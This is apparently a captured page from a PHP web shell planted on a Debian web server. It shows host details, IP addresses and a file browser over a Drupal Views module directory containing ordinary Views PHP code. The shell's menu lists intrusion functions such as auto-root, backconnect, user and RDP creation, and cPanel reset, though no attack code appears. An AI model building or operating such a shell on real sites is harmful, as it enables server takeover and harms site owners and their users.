Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.191.171.86
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
aggregator
[ DIR ]
drwxr-xr-x
book
[ DIR ]
drwxr-xr-x
comment
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
field
[ DIR ]
drwxr-xr-x
filter
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
node
[ DIR ]
drwxr-xr-x
profile
[ DIR ]
drwxr-xr-x
search
[ DIR ]
drwxr-xr-x
statistics
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
taxonomy
[ DIR ]
drwxr-xr-x
tracker
[ DIR ]
drwxr-xr-x
translation
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
aggregator.views.inc
12.06
KB
-rw-r--r--
book.views.inc
3.37
KB
-rw-r--r--
comment.views.inc
19.74
KB
-rw-r--r--
comment.views_default.inc
14.23
KB
-rw-r--r--
contact.views.inc
450
B
-rw-r--r--
field.views.inc
18.61
KB
-rw-r--r--
file.views.inc
2.33
KB
-rw-r--r--
filter.views.inc
744
B
-rw-r--r--
image.views.inc
2.31
KB
-rw-r--r--
locale.views.inc
5.77
KB
-rw-r--r--
node.views.inc
24.63
KB
-rw-r--r--
node.views_default.inc
16.01
KB
-rw-r--r--
node.views_template.inc
7.79
KB
-rw-r--r--
poll.views.inc
1006
B
-rw-r--r--
profile.views.inc
5.63
KB
-rw-r--r--
search.views.inc
5.74
KB
-rw-r--r--
search.views_default.inc
5.99
KB
-rw-r--r--
statistics.views.inc
6.35
KB
-rw-r--r--
statistics.views_default.inc
12.89
KB
-rw-r--r--
system.views.inc
19.52
KB
-rw-r--r--
taxonomy.views.inc
17.28
KB
-rw-r--r--
taxonomy.views_default.inc
5.63
KB
-rw-r--r--
tracker.views.inc
5.21
KB
-rw-r--r--
translation.views.inc
3.48
KB
-rw-r--r--
user.views.inc
16.23
KB
-rw-r--r--
views.views.inc
3.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views.views.inc
<?php /** * @file * Provide views data and handlers that aren't tied to any other module. * * @ingroup views_module_handlers */ /** * Implements hook_views_data(). */ function views_views_data() { $data['views']['table']['group'] = t('Global'); $data['views']['table']['join'] = array( // #global is a special flag which let's a table appear all the time. '#global' => array(), ); $data['views']['random'] = array( 'title' => t('Random'), 'help' => t('Randomize the display order.'), 'sort' => array( 'handler' => 'views_handler_sort_random', ), ); $data['views']['null'] = array( 'title' => t('Null'), 'help' => t('Allow a contextual filter value to be ignored. The query will not be altered by this contextual filter value. Can be used when contextual filter values come from the URL, and a part of the URL needs to be ignored.'), 'argument' => array( 'handler' => 'views_handler_argument_null', ), ); $data['views']['nothing'] = array( 'title' => t('Custom text'), 'help' => t('Provide custom text or link.'), 'field' => array( 'handler' => 'views_handler_field_custom', ), ); $data['views']['counter'] = array( 'title' => t('View result counter'), 'help' => t('Displays the actual position of the view result'), 'field' => array( 'handler' => 'views_handler_field_counter', ), ); $data['views']['area'] = array( 'title' => t('Text area'), 'help' => t('Provide markup text for the area.'), 'area' => array( 'handler' => 'views_handler_area_text', ), ); $data['views']['area_text_custom'] = array( 'title' => t('Unfiltered text'), 'help' => t('Add unrestricted, custom text or markup. This is similar to the custom text field.'), 'area' => array( 'handler' => 'views_handler_area_text_custom', ), ); $data['views']['view'] = array( 'title' => t('View area'), 'help' => t('Insert a view inside an area.'), 'area' => array( 'handler' => 'views_handler_area_view', ), ); $data['views']['result'] = array( 'title' => t('Result summary'), 'help' => t('Shows result summary, for example the items per page.'), 'area' => array( 'handler' => 'views_handler_area_result', ), ); $data['views']['messages'] = array( 'title' => t('Messages'), 'help' => t('Displays messages in the area.'), 'area' => array( 'handler' => 'views_handler_area_messages', ), ); if (module_exists('contextual')) { $data['views']['contextual_links'] = array( 'title' => t('Contextual Links'), 'help' => t('Display fields in a contextual links menu.'), 'field' => array( 'handler' => 'views_handler_field_contextual_links', ), ); } $data['views']['combine'] = array( 'title' => t('Combine fields filter'), 'help' => t('Combine two fields together and search by them.'), 'filter' => array( 'handler' => 'views_handler_filter_combine', ), ); if (module_invoke('ctools', 'api_version', '1.7.1')) { $data['views']['expression'] = array( 'title' => t('Math expression'), 'help' => t('Evaluates a mathematical expression and displays it.'), 'field' => array( 'handler' => 'views_handler_field_math', 'float' => TRUE, ), ); } $data['views']['fields_compare'] = array( 'title' => t('Fields comparison'), 'help' => t('Compare database fields against eachother.'), 'filter' => array( 'help' => t('Use fields comparison to filter the result of the view.'), 'handler' => 'views_handler_filter_fields_compare', ) ); return $data; }
Close